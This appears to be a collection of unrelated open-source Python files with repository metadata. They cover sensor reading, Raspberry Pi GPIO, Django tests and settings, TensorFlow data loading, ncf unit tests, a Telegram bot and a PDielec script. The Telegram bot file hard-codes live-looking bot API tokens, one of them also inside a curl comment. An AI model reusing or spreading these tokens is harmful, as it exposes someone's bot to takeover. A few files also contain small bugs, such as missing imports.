import ControlI2C
def get_data():
# Scan device
nRet = ControlI2C.VII_ScanDevice(1)
if(nRet <= 0):
print("No device connect!")
exit()
else:
print("Connected device number is:"+repr(nRet))
# Open device
nRet = ControlI2C.VII_OpenDevice(ControlI2C.VII_USBI2C,0,0)
if(nRet != ControlI2C.ERR_SUCCESS):
print("Open device error!")
exit()
else:
print("Open device success!")
# Initialize device
I2C_InitConfig = ControlI2C.VII_INIT_CONFIG()
# Master mode
I2C_InitConfig.MasterMode = ControlI2C.VII_MASTER
# Hardware control
I2C_InitConfig.ControlMode = ControlI2C.VII_HCTL_MODE
# 7-bit address mode
I2C_InitConfig.AddrType = ControlI2C.VII_ADDR_7BIT
# Sub address width->1byte
I2C_InitConfig.SubAddrWidth = ControlI2C.VII_SUB_ADDR_NONE
# Clock speed (in Hz)
I2C_InitConfig.ClockSpeed = 100000
nRet = ControlI2C.VII_InitI2C(ControlI2C.VII_USBI2C,0,0,byref(I2C_InitConfig))
if(nRet != ControlI2C.ERR_SUCCESS):
print("Initialize device error!")
exit()
else:
print("Initialize device success!")
# Wake up AM2311 sensor
WriteData = (c_byte * 8)()
ControlI2C.VII_WriteBytes(ControlI2C.VII_USBI2C, 0, 0, 0xB8, 0x00, byref(WriteData), 1)
# Send out read temperature and humanity command
WriteData[0] = 0X03;
WriteData[1] = 0X00;
WriteData[2] = 0X04;
nRet = ControlI2C.VII_WriteBytes(ControlI2C.VII_USBI2C, 0, 0, 0xB8, 0x00, byref(WriteData), 3)
if (nRet != ControlI2C.ERR_SUCCESS):
print("Write data error! %d" % nRet)
exit()
# Read out temperature and humanity
ReadData = (c_ubyte * 8)()
nRet = ControlI2C.VII_ReadBytes(ControlI2C.VII_USBI2C, 0, 0, 0xB8, 0x00, byref(ReadData), 8)
if (nRet != ControlI2C.ERR_SUCCESS):
print("Read data error! %d" % nRet)
exit()
else:
t = ((ReadData[4] << 8) | ReadData[5]) / 10.0
h = ((ReadData[2] << 8) | ReadData[3]) / 10.0
print("temperature: %.1f ¡æ" % t)
print("humanity: %.1f £¥" % h)
result = {'t': t, 'h': h}
return result
# Loop measurement
# while(1):
# # Wake up AM2311 sensor
# WriteData = (c_byte * 8)()
# ControlI2C.VII_WriteBytes(ControlI2C.VII_USBI2C,0,0,0xB8,0x00,byref(WriteData),1)
# # Send out read temperature and humanity command
# WriteData[0] = 0X03;
# WriteData[1] = 0X00;
# WriteData[2] = 0X04;
# nRet = ControlI2C.VII_WriteBytes(ControlI2C.VII_USBI2C,0,0,0xB8,0x00,byref(WriteData),3)
# if(nRet != ControlI2C.ERR_SUCCESS):
# print("Write data error! %d"%nRet)
# exit()
# # Read out temperature and humanity
# ReadData = (c_ubyte * 8)()
# nRet = ControlI2C.VII_ReadBytes(ControlI2C.VII_USBI2C,0,0,0xB8,0x00,byref(ReadData),8)
# if(nRet != ControlI2C.ERR_SUCCESS):
# print("Read data error! %d"%nRet)
# exit()
# else:
# t = ((ReadData[4] << 8) | ReadData[5]) / 10.0
# h = ((ReadData[2] << 8) | ReadData[3]) / 10.0
# print("temperature: %.1f ¡æ"%t)
# print("humanity: %.1f £¥"%h)
# sleep(1)
|
ilab-tongji/raas
|
sensor/humiture/Python_USB_I2C_AM2321B.py
|
Python
|
mit
| 3,951
|
"""
Blink LEDs using Raspberry PI GPIO
"""
import RPi.GPIO as GPIO
import time
def blink(pin, num=5, speed=1):
"""Blink LED using given GPIO pin, number of times and speed.
Args:
- pin (int): GPIO pin to send signal
- num (int): num of times to blink (default: 5)
- speed (int): speed of each blink in seconds (default: 1)
Returns:
- None (blinks led)
"""
for i in range(num):
GPIO.setmode(GPIO.BCM) # Set GPIO pin numbering
GPIO.setup(pin, GPIO.OUT) # Set requested pin for output
GPIO.output(pin, GPIO.HIGH) # Turn on requested GPIO pin
time.sleep(speed) # Wait
GPIO.output(pin, GPIO.LOW) # Turn off requested GPIO pin
time.sleep(speed) # Wait
GPIO.cleanup() # Clean pin setup
if __name__ == '__main__':
pin = input("Enter pin number: ")
num = input("Enter the total number of times to blink: ")
speed = input("Enter the length of each blink in seconds: ")
Blink(int(pin), int(num), float(speed))
|
kbsezginel/raspberry-pi
|
scripts/rpi/led/blink.py
|
Python
|
bsd-3-clause
| 1,077
|
#!/usr/bin/env python
# -*- test-case-name: agdevicecontrol.test.test_resource -*-
#
# AGDeviceControl
# Copyright (C) 2005 The Australian National University
#
# This file is part of AGDeviceControl.
#
# AGDeviceControl is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# AGDeviceControl is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with AGDeviceControl; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
from glob import glob as pyglob
import imp
import os, os.path
def module_path(p, path=None):
"""Recursive search to find a module's absolute path"""
# package hierarchy is dot separated, e.g., agdevicecontrol.clients
components = p.split('.')
modname = components[0]
file, path, description = imp.find_module(modname,path)
if file is not None:
try:
modobj = imp.load_module(modname, file, path, description)
#print "DEBUG: ", modobj.__file__
path = modobj.__file__
finally:
file.close()
if len(components) == 1:
return path
else:
return module_path('.'.join(components[1:]), path=[path])
def globdict(package, subdir=[], filter='*'):
# find absolute file path of package
path = module_path(package)
# add subdirs
path += os.sep + os.path.join(subdir)
if os.path.isdir(path):
dict = {}
for f in pyglob(path + os.sep + filter):
dict[os.path.split(f)[1]] = f
return dict
else:
raise ImportError
|
pwarren/AGDeviceControl
|
agdevicecontrol/common/resource.py
|
Python
|
gpl-2.0
| 2,011
|
from copy import deepcopy
from datetime import timedelta
import pytest
from django.utils import dateparse, timezone
from events.models import Event
from events.tests.test_event_get import get_detail, get_list
from events.tests.utils import assert_fields_exist, post_event, put_event
from extension_course.models import Course
COURSE_DATA = {
'enrolment_start_time': "2118-06-11T07:11:05.184117Z",
'enrolment_end_time': "2118-06-12T07:11:05.184117Z",
'maximum_attendee_capacity': 200,
'minimum_attendee_capacity': 20,
'remaining_attendee_capacity': 100,
}
COURSE_FIELDS = set(COURSE_DATA.keys())
@pytest.fixture
def minimal_event_with_course_dict(minimal_event_dict):
data = deepcopy(minimal_event_dict)
data['extension_course'] = COURSE_DATA
return data
@pytest.fixture
def event_with_course(event):
Course.objects.get_or_create(event=event, defaults={
'enrolment_start_time': timezone.now() - timedelta(days=1),
'enrolment_end_time': timezone.now() + timedelta(days=1),
'maximum_attendee_capacity': 100,
'minimum_attendee_capacity': 10,
'remaining_attendee_capacity': 50,
})
return event
def check_extension_data(data, course):
assert_fields_exist(data, COURSE_FIELDS)
assert dateparse.parse_datetime(data['enrolment_start_time']) == course.enrolment_start_time
assert dateparse.parse_datetime(data['enrolment_end_time']) == course.enrolment_end_time
assert data['maximum_attendee_capacity'] == course.maximum_attendee_capacity
assert data['minimum_attendee_capacity'] == course.minimum_attendee_capacity
assert data['remaining_attendee_capacity'] == course.remaining_attendee_capacity
@pytest.mark.django_db
def test_get_course_list(user_api_client, event_with_course):
response = get_list(user_api_client)
extension_data = response.data['data'][0]['extension_course']
check_extension_data(extension_data, event_with_course.extension_course)
@pytest.mark.django_db
def test_get_course_detail(user_api_client, event_with_course):
response = get_detail(user_api_client, event_with_course.pk)
extension_data = response.data['extension_course']
check_extension_data(extension_data, event_with_course.extension_course)
@pytest.mark.django_db
def test_post_course(minimal_event_with_course_dict, user_api_client):
response = post_event(user_api_client, minimal_event_with_course_dict)
assert Course.objects.count() == 1
event = Event.objects.latest('id')
course = Course.objects.get(event=event)
check_extension_data(response.data['extension_course'], course)
check_extension_data(COURSE_DATA, course)
@pytest.mark.django_db
def test_put_course(event_with_course, minimal_event_with_course_dict, user_api_client):
response = put_event(user_api_client, event_with_course, minimal_event_with_course_dict)
assert Course.objects.count() == 1
course = event_with_course.extension_course
course.refresh_from_db()
check_extension_data(response.data['extension_course'], course)
check_extension_data(COURSE_DATA, course)
|
City-of-Helsinki/linkedevents
|
extension_course/tests/test_api.py
|
Python
|
mit
| 3,110
|
import tensorflow as tf
import copy
def create_list_object(Object, count):
"""
create a list of obejct using deep copy in
cased used in different theads
Args:
Object: object to be copied
count: the number of copies
Return:
a list of objects
"""
res_list = []
for _ in xrange(count):
res_list.append(Object)
return res_list
class DataClass():
""" DataClass:
used for decode line
"""
def __init__(self, data_format):
self.data_format = data_format
self.decode_class = None
class BINClass():
"""
used for load binary file
"""
def __init__(self, shape, dtype = tf.float32):
""" shape: a list """
self.decode_fun = tf.decode_raw
self.dtype = dtype
self.shape = shape
def decode(self, filename, distort_data = False, whiten_data = False):
""" distort_data and whiten_data are not used """
bin_file = tf.read_file(filename)
bin_tensor = tf.decode_raw(bin_file, self.dtype)
bin_tensor = tf.to_float(bin_tensor)
bin_tensor = tf.reshape(bin_tensor, self.shape)
return bin_tensor
class ImageClass():
def __init__(self, shape, channels, offset, ratio = None, name = None):
"""offset: the difference between cropped image and orginal image
final shape will be shape
"""
self.channels = channels
self.ratio = ratio
self.name = name
self.shape = shape
self.offset = offset
self.decode_fun = None
def decode(self, filename, distort_data, whiten_data = True):
"""distort: random distort the iamge"""
image_tensor = tf.read_file(filename)
image_tensor = self.decode_fun(image_tensor, channels = self.channels, ratio = self.ratio)
image_tensor = tf.image.convert_image_dtype(image_tensor, tf.float32)
image_tensor = tf.image.resize_images(image_tensor,
[self.shape[0] + self.offset, self.shape[1] + self.offset])
if distort_data:
# it will crop in the function
image_tensor = self.distort_op(image_tensor)
else:
image_tensor = tf.image.resize_image_with_crop_or_pad(image_tensor,
self.shape[0], self.shape[1])
if whiten_data:
# Subtract off the mean and divide by the variance of the pixels.
image_tensor = tf.image.per_image_whitening(image_tensor)
return image_tensor
def distort_op(self, image_tensor):
""" copied from tensorflow cifar10 tutorial"""
# Randomly crop a [height, width] section of the image.
distorted_image = tf.random_crop(image_tensor, [self.shape[0],self.shape[1], self.channels])
# Randomly flip the image horizontally.
distorted_image = tf.image.random_flip_left_right(distorted_image)
# Because these operations are not commutative, consider randomizing
# the order their operation.
# distorted_image = tf.image.random_brightness(distorted_image,
# max_delta=63)
# distorted_image = tf.image.random_contrast(distorted_image,
# lower=0.2, upper=1.8)
return distorted_image
class JPGClass(ImageClass):
def __init__(self, shape, channels = None, off_set = None, ratio = None, name = None):
ImageClass.__init__(self, shape, channels, off_set, ratio, name)
"""
used for load jpg image file
"""
self.decode_fun = tf.image.decode_jpeg
class PNGClass(ImageClass):
"""
used for load png image file
"""
def __init__(self, shape, channels = None, off_set = None, ratio = None, name = None):
ImageClass.__init__(self, shape, channels, off_set, ratio, name)
self.decode_fun = tf.image.decode_png
|
polltooh/traffic_video_analysis
|
TensorflowToolbox/data_class.py
|
Python
|
apache-2.0
| 4,030
|
"""
Django settings for filfinds project.
For more information on this file, see
https://docs.djangoproject.com/en/dev/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/dev/ref/settings/
"""
from django.core.urlresolvers import reverse_lazy
from os.path import dirname, join, exists
# Build paths inside the project like this: join(BASE_DIR, "directory")
BASE_DIR = dirname(dirname(dirname(__file__)))
STATICFILES_DIRS = [join(BASE_DIR, 'static')]
MEDIA_ROOT = join(BASE_DIR, 'media')
MEDIA_URL = "/media/"
# Use Django templates using the new Django 1.8 TEMPLATES settings
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
join(BASE_DIR, 'templates'),
# insert more TEMPLATE_DIRS here
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
# Insert your TEMPLATE_CONTEXT_PROCESSORS here or use this
# list if you haven't customized them:
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
],
},
},
]
# Use 12factor inspired environment variables or from a file
import environ
env = environ.Env()
# Ideally move env file should be outside the git repo
# i.e. BASE_DIR.parent.parent
env_file = join(dirname(__file__), 'local.env')
if exists(env_file):
environ.Env.read_env(str(env_file))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/dev/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# Raises ImproperlyConfigured exception if SECRET_KEY not in os.environ
SECRET_KEY = env('SECRET_KEY')
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.auth',
'django_admin_bootstrapped',
'django.contrib.admin',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'authtools',
'crispy_forms',
'easy_thumbnails',
'profiles',
'accounts',
'content',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'filfinds.urls'
WSGI_APPLICATION = 'filfinds.wsgi.application'
# Database
# https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
# Raises ImproperlyConfigured exception if DATABASE_URL not in
# os.environ
'default': env.db(),
}
# Internationalization
# https://docs.djangoproject.com/en/dev/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/dev/howto/static-files/
STATIC_URL = '/static/'
ALLOWED_HOSTS = []
# Crispy Form Theme - Bootstrap 3
CRISPY_TEMPLATE_PACK = 'bootstrap3'
# For Bootstrap 3, change error alert to 'danger'
from django.contrib import messages
MESSAGE_TAGS = {
messages.ERROR: 'danger'
}
# Authentication Settings
AUTH_USER_MODEL = 'authtools.User'
LOGIN_REDIRECT_URL = reverse_lazy("profiles:show_self")
LOGIN_URL = reverse_lazy("accounts:login")
THUMBNAIL_EXTENSION = 'png' # Or any extn for your thumbnails
|
arminafrancisco/project1
|
src/filfinds/settings/base.py
|
Python
|
mit
| 3,983
|
#!/usr/bin/env python
import unittest
import ncf
import os.path
import subprocess
class TestNcf(unittest.TestCase):
def setUp(self):
self.test_technique_file = os.path.realpath('test_technique.cf')
self.test_generic_method_file = 'test_generic_method.cf'
self.technique_content = open(self.test_technique_file).read()
self.generic_method_content = open(self.test_generic_method_file).read()
def test_get_ncf_root_dir(self):
self.assertEquals(ncf.get_root_dir(), os.path.realpath(os.path.dirname(os.path.realpath(__file__)) + "/../../"))
#####################################
# Generic tests for parsing .cf files
#####################################
def test_parse_bundlefile_empty(self):
"""Attempting to parse an empty string should raise an exception"""
self.assertRaises(Exception, ncf.parse_bundlefile_metadata, "")
def test_parse_bundlefile_incomplete(self):
"""Attempting to parse a bundle file with metadata after the bundle agent declaration should raise an exception"""
self.assertRaises(Exception, ncf.parse_bundlefile_metadata, """# @name A name
bundle agent thingy {
}
# @description bla bla
# @version 1.0""")
#########################
# Technique parsing tests
#########################
def test_parse_technique(self):
"""Parsing should return a dict with all defined technique tags"""
metadata = ncf.parse_technique_metadata(self.technique_content)
self.assertEqual(sorted(metadata.keys()), sorted(ncf.tags["technique"]+ncf.tags["common"]))
def test_parse_technique_data(self):
"""Parsing should return a dict with the data from the test technique"""
metadata = ncf.parse_technique_metadata(self.technique_content)
self.assertEqual(metadata['name'], "Bla Technique for evaluation of parsingness")
self.assertEqual(metadata['description'], "This meta-Technique is a sample only, allowing for testing.")
self.assertEqual(metadata['version'], "0.1")
self.assertEqual(metadata['bundle_name'], "bla")
self.assertEqual(metadata['bundle_args'], [])
##############################
# Generic method parsing tests
##############################
def test_parse_generic_method(self):
"""Parsing a generic method should return a dict with all defined generic_method tags"""
metadata = ncf.parse_generic_method_metadata(self.generic_method_content)
self.assertEqual(sorted(metadata.keys()), sorted(ncf.tags["generic_method"]+ncf.tags["common"]))
def test_parse_generic_method_data(self):
"""Parsing should return a dict with the data from the test generic_method"""
metadata = ncf.parse_generic_method_metadata(self.generic_method_content)
self.assertEqual(metadata['bundle_name'], "package_install_version")
self.assertEqual(metadata['bundle_args'], ["package_name", "package_version"])
self.assertEqual(metadata['name'], "Package install")
self.assertEqual(metadata['class_prefix'], "package_install")
self.assertEqual(metadata['class_parameter'], "package_name")
self.assertEqual(metadata['class_parameter_id'], 1)
self.assertEqual(len(metadata), len(ncf.tags["generic_method"]+ncf.tags["common"]))
###########################################################
# Tests to obtain the generic methods that a Technique uses
###########################################################
def test_parse_technique_generic_method_calls_nonexistant_file(self):
"""Attempting to parse a non existant file should return an exception"""
self.assertRaises(Exception, ncf.parse_technique_methods, "/dev/nonexistant")
def test_parse_technique_generic_method_calls(self):
"""Parsing a technique should return a list of it's generic method calls"""
bundle_calls = ncf.parse_technique_methods(self.test_technique_file)
expected = [ { 'method_name': 'package_install_version', 'args': ['${bla.apache_package_name}', '2.2.11'], 'class_context': 'any' },
{ 'method_name': 'service_start', 'args': ['${bla.apache_package_name}'], 'class_context': 'cfengine' },
{ 'method_name': 'package_install', 'args': ['openssh-server'], 'class_context': 'cfengine' },
]
self.assertEqual(bundle_calls, expected)
def test_parse_technique_generic_method_calls_strings(self):
"""Parsing a technique should return a list of it's generic method calls even if they are string literals"""
bundle_calls = ncf.parse_technique_methods(self.test_technique_file)
expected = [ { 'method_name': 'package_install_version', 'args': ['${bla.apache_package_name}', '2.2.11'], 'class_context': 'any' },
{ 'method_name': 'service_start', 'args': ['${bla.apache_package_name}'], 'class_context': 'cfengine' },
{ 'method_name': 'package_install', 'args': ['openssh-server'], 'class_context': 'cfengine' },
]
self.assertEqual(bundle_calls, expected)
#####################################
# Tests for reading all metadata info
#####################################
def test_get_all_generic_methods_metadata(self):
"""get_all_generic_methods_metadata should return a list of all generic_methods with all defined metadata tags"""
metadata = ncf.get_all_generic_methods_metadata()
number_generic_methods = len(ncf.get_all_generic_methods_filenames())
self.assertEquals(number_generic_methods, len(metadata))
def test_get_all_techniques_metadata(self):
"""get_all_techniques_metadata should return a list of all techniques with all defined metadata tags and methods_called"""
metadata = ncf.get_all_techniques_metadata()
number = len(ncf.get_all_techniques_filenames())
self.assertEquals(number, len(metadata))
if __name__ == '__main__':
unittest.main()
|
ncharles/ncf
|
tests/unit/test_ncf.py
|
Python
|
gpl-3.0
| 5,927
|
import urllib
import urllib2
import pprint
import json
import datetime
import time
import logging
from calendar_bot import CalendarClient
'''returns 'TANAAN!!' if today is paapaiva and string for something else
returns None if no paapaiva in next 10 days
'''
def is_paapaiva(client):
#the events from raati15 calendar for the next 10 days
events = []
events = client.get_calendar_events(10)
#print(events)
#events is like [('2016-09-11T12:30:00+03:00', u'test event')]
if events:
#removing aakkoset
ascii_events = [(x[0],x[1].encode('ascii', 'xmlcharrefreplace').replace('ä', 'a') ) for x in events]
#filtering only paapaivat
only_paapaivas = [x for x in ascii_events if 'paa' in x[1].lower() and 'paiva' in x[1].lower() ]
#print(only_paapaivas)
for paiva in only_paapaivas:
#date parsing
stripped_date = paiva[0][0:10]
calendar_date = datetime.datetime.strptime(stripped_date, '%Y-%m-%d')
#if today is paapaiva
now = datetime.datetime.utcnow()
today = now - datetime.timedelta(minutes=now.minute, hours=now.hour, seconds=now.second, microseconds=now.microsecond)
#print(calendar_date)
#print(today)
if calendar_date == today:
return "TANAAN!!"
else:
return "{}".format(stripped_date)
return None
else:
return None
from telegram.error import (TelegramError, Unauthorized, BadRequest, TimedOut, ChatMigrated, NetworkError)
from telegram.ext import CommandHandler
from telegram.ext import Updater
tanaan_photo_address = 'AgADBAADBeY1G5sdZAeZOQAB_xifyPymVaAZAARU0-rzUc8xq5I8AAIC' # 'http://i.imgur.com/2k3j2NA.jpg'
fugee_rooriin_address ='AgADBAADKeI1G1caZAeDNH-tzcHDX8VYoBkABKVGDyIMeSxuQz0AAgI' #'http://i.imgur.com/ykFysmr.jpg'
ei_tanaan_address = 'AgADBAADLNM1GxUdZAfdLhEdfQINz65boBkABN7nsRV8UWIQwSAAAgI' #'http://i.imgur.com/nxkzkpW.jpg'
calendar_id = '2a668f5qv3pmvn251mviqlc6vk@group.calendar.google.com' #id for raati 15 calendar
calendar_client = CalendarClient(calendar_id)
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',level=logging.INFO)
botid = '268119392:AAErkOPlFBVJIG7Yc_L2m-IzRA0f67tz7qg'
test_botid = '301043923:AAE0VP2x_wWV70s-Yvz3N4_InhG0ShIGhyA'
updater = Updater(token=botid)
dispatcher = updater.dispatcher
#starting
def start(bot, update):
bot.sendMessage(chat_id=update.message.chat_id, text="I'm a bot, please talk to me!")
def stop(bot, update):
updater.stop()
updater.idle()
#paapaiva
def paapaiva(bot, update):
paapaiva = is_paapaiva(calendar_client)
if paapaiva:
bot.sendMessage(chat_id=update.message.chat_id, text=("Seuraava PAAPAIVA on:\n" + paapaiva) )
if paapaiva == "TANAAN!!":
bot.sendPhoto(chat_id=update.message.chat_id, photo=tanaan_photo_address)
else:
bot.send_message(chat_id=update.message.chat_id, text=("Seuraava PAAPAIVA on:\n" + "Ei PAAPAIVAA seuraavaan 10 paivaan :(") )
#fugee
def fugee(bot, update):
msg = bot.sendPhoto(chat_id=update.message.chat_id, photo=fugee_rooriin_address)
#ei
def ei(bot, update):
msg = bot.sendPhoto(chat_id=update.message.chat_id, photo=ei_tanaan_address)
#pprint.pprint("sent photo id: " + msg.photo[0].file_id)
#error handling
def error_callback(bot, update, error):
try:
raise error
except Unauthorized:
print("unauthorized") # remove update.message.chat_id from conversation list
except BadRequest:
print("Badrequest") # handle malformed requests - read more below!
except TimedOut:
print("TimedOut") # handle slow connection problems
except NetworkError:
print("netwrokError") # handle other connection problems
except ChatMigrated as e:
print("chatmigrated") # the chat_id of a group has changed, use e.new_chat_id instead
except TelegramError:
print("telegramerror") # handle all other telegram related errors
start_handler = CommandHandler('start', start)
stop_handler = CommandHandler('stop', stop)
paapaiva_handler = CommandHandler('paapaiva', paapaiva)
fugee_handler = CommandHandler('fugee', fugee)
ei_handler = CommandHandler('ei', ei)
dispatcher.add_handler(start_handler) #handler '/start'
dispatcher.add_handler(stop_handler)
dispatcher.add_handler(paapaiva_handler) #handle '/paapaiva'
dispatcher.add_handler(fugee_handler)
dispatcher.add_handler(ei_handler)
dispatcher.add_error_handler(error_callback) #error handler
updater.start_polling(poll_interval = 2.0, clean = True)
#curl -s -X POST "https://api.telegram.org/bot268119392:AAErkOPlFBVJIG7Yc_L2m-IzRA0f67tz7qg/sendPhoto" -F chat_id=89456514 -F photo="http://i.imgur.com/2k3j2NA.jpg"
|
miikama/telegram-bot
|
bot2.py
|
Python
|
mit
| 4,609
|
#
# Handle the special case of the first scenario
#
self.notebook.switchScenario(0,scenarioType="Powder")
#
#
#
tab = self.notebook.mainTab
tab.settings['Program'] = 'castep'
tab.settings['Output file name'] = 'phonon.castep'
tab.settings['Excel file name'] = 'analysis_bruggeman.xlsx'
tab.settings['Script file name'] = 'analysis_bruggeman.py'
tab.settings['QM program'] = ''
#
#
tab = self.notebook.settingsTab
tab.settings['Eckart flag'] = True
tab.settings['Neutral Born charges'] = False
tab.settings['Sigma value'] = 10.0
tab.settings['Mass definition'] = 'average'
tab.settings['Optical permittivity edited'] = False
tab.sigmas_cm1 = [10.0, 10.0, 10.0, 10.0, 10.0, 10.0]
#
#
tab = self.notebook.scenarios[0]
tab.settings['Legend'] = 'f=0.01'
tab.settings['Scenario type'] = 'Powder'
tab.settings['Matrix'] = 'ptfe'
tab.settings['Matrix density'] = 2.2
tab.settings['Matrix permittivity'] = 2.0
tab.settings['Bubble radius'] = 30.0
tab.settings['Bubble volume fraction'] = 0.0
tab.settings['Mass fraction'] = 0.01579304466235449
tab.settings['Volume fraction'] = 0.009999999999999998
tab.settings['Particle size(mu)'] = 0.0001
tab.settings['Particle size distribution sigma(mu)'] = 0.0
tab.settings['Ellipsoid a/b'] = 1.0
tab.settings['Unique direction - h'] = 0
tab.settings['Unique direction - k'] = 0
tab.settings['Unique direction - l'] = 1
tab.settings['Mass or volume fraction'] = 'volume'
tab.settings['ATR material refractive index'] = 4.0
tab.settings['ATR theta'] = 45.0
tab.settings['ATR S polarisation fraction'] = 0.5
tab.settings['Effective medium method'] = 'Bruggeman'
tab.settings['Particle shape'] = 'Sphere'
#
#
self.notebook.addScenario(scenarioType="Powder")
tab = self.notebook.scenarios[1]
tab.settings['Legend'] = 'f=0.1'
tab.settings['Scenario type'] = 'Powder'
tab.settings['Matrix'] = 'ptfe'
tab.settings['Matrix density'] = 2.2
tab.settings['Matrix permittivity'] = 2.0
tab.settings['Bubble radius'] = 30.0
tab.settings['Bubble volume fraction'] = 0.0
tab.settings['Mass fraction'] = 0.1500292973489613
tab.settings['Volume fraction'] = 0.09999999999999999
tab.settings['Particle size(mu)'] = 0.0001
tab.settings['Particle size distribution sigma(mu)'] = 0.0
tab.settings['Ellipsoid a/b'] = 1.0
tab.settings['Unique direction - h'] = 0
tab.settings['Unique direction - k'] = 0
tab.settings['Unique direction - l'] = 1
tab.settings['Mass or volume fraction'] = 'volume'
tab.settings['ATR material refractive index'] = 4.0
tab.settings['ATR theta'] = 45.0
tab.settings['ATR S polarisation fraction'] = 0.5
tab.settings['Effective medium method'] = 'Bruggeman'
tab.settings['Particle shape'] = 'Sphere'
#
#
self.notebook.addScenario(scenarioType="Powder")
tab = self.notebook.scenarios[2]
tab.settings['Legend'] = 'f=0.2'
tab.settings['Scenario type'] = 'Powder'
tab.settings['Matrix'] = 'ptfe'
tab.settings['Matrix density'] = 2.2
tab.settings['Matrix permittivity'] = 2.0
tab.settings['Bubble radius'] = 30.0
tab.settings['Bubble volume fraction'] = 0.0
tab.settings['Mass fraction'] = 0.2842572707828141
tab.settings['Volume fraction'] = 0.19999999999999996
tab.settings['Particle size(mu)'] = 0.0001
tab.settings['Particle size distribution sigma(mu)'] = 0.0
tab.settings['Ellipsoid a/b'] = 1.0
tab.settings['Unique direction - h'] = 0
tab.settings['Unique direction - k'] = 0
tab.settings['Unique direction - l'] = 1
tab.settings['Mass or volume fraction'] = 'volume'
tab.settings['ATR material refractive index'] = 4.0
tab.settings['ATR theta'] = 45.0
tab.settings['ATR S polarisation fraction'] = 0.5
tab.settings['Effective medium method'] = 'Bruggeman'
tab.settings['Particle shape'] = 'Sphere'
#
#
self.notebook.addScenario(scenarioType="Powder")
tab = self.notebook.scenarios[3]
tab.settings['Legend'] = 'f=0.3'
tab.settings['Scenario type'] = 'Powder'
tab.settings['Matrix'] = 'ptfe'
tab.settings['Matrix density'] = 2.2
tab.settings['Matrix permittivity'] = 2.0
tab.settings['Bubble radius'] = 30.0
tab.settings['Bubble volume fraction'] = 0.0
tab.settings['Mass fraction'] = 0.405055368745222
tab.settings['Volume fraction'] = 0.30000000000000004
tab.settings['Particle size(mu)'] = 0.0001
tab.settings['Particle size distribution sigma(mu)'] = 0.0
tab.settings['Ellipsoid a/b'] = 1.0
tab.settings['Unique direction - h'] = 0
tab.settings['Unique direction - k'] = 0
tab.settings['Unique direction - l'] = 1
tab.settings['Mass or volume fraction'] = 'volume'
tab.settings['ATR material refractive index'] = 4.0
tab.settings['ATR theta'] = 45.0
tab.settings['ATR S polarisation fraction'] = 0.5
tab.settings['Effective medium method'] = 'Bruggeman'
tab.settings['Particle shape'] = 'Sphere'
#
#
self.notebook.addScenario(scenarioType="Powder")
tab = self.notebook.scenarios[4]
tab.settings['Legend'] = 'f=0.4'
tab.settings['Scenario type'] = 'Powder'
tab.settings['Matrix'] = 'ptfe'
tab.settings['Matrix density'] = 2.2
tab.settings['Matrix permittivity'] = 2.0
tab.settings['Bubble radius'] = 30.0
tab.settings['Bubble volume fraction'] = 0.0
tab.settings['Mass fraction'] = 0.5143431083692053
tab.settings['Volume fraction'] = 0.4
tab.settings['Particle size(mu)'] = 0.0001
tab.settings['Particle size distribution sigma(mu)'] = 0.0
tab.settings['Ellipsoid a/b'] = 1.0
tab.settings['Unique direction - h'] = 0
tab.settings['Unique direction - k'] = 0
tab.settings['Unique direction - l'] = 1
tab.settings['Mass or volume fraction'] = 'volume'
tab.settings['ATR material refractive index'] = 4.0
tab.settings['ATR theta'] = 45.0
tab.settings['ATR S polarisation fraction'] = 0.5
tab.settings['Effective medium method'] = 'Bruggeman'
tab.settings['Particle shape'] = 'Sphere'
#
#
self.notebook.addScenario(scenarioType="Powder")
tab = self.notebook.scenarios[5]
tab.settings['Legend'] = 'f=0.5'
tab.settings['Scenario type'] = 'Powder'
tab.settings['Matrix'] = 'ptfe'
tab.settings['Matrix density'] = 2.2
tab.settings['Matrix permittivity'] = 2.0
tab.settings['Bubble radius'] = 30.0
tab.settings['Bubble volume fraction'] = 0.0
tab.settings['Mass fraction'] = 0.613690836374523
tab.settings['Volume fraction'] = 0.49999999999999994
tab.settings['Particle size(mu)'] = 0.0001
tab.settings['Particle size distribution sigma(mu)'] = 0.0
tab.settings['Ellipsoid a/b'] = 1.0
tab.settings['Unique direction - h'] = 0
tab.settings['Unique direction - k'] = 0
tab.settings['Unique direction - l'] = 1
tab.settings['Mass or volume fraction'] = 'volume'
tab.settings['ATR material refractive index'] = 4.0
tab.settings['ATR theta'] = 45.0
tab.settings['ATR S polarisation fraction'] = 0.5
tab.settings['Effective medium method'] = 'Bruggeman'
tab.settings['Particle shape'] = 'Sphere'
#
#
self.notebook.addScenario(scenarioType="Powder")
tab = self.notebook.scenarios[6]
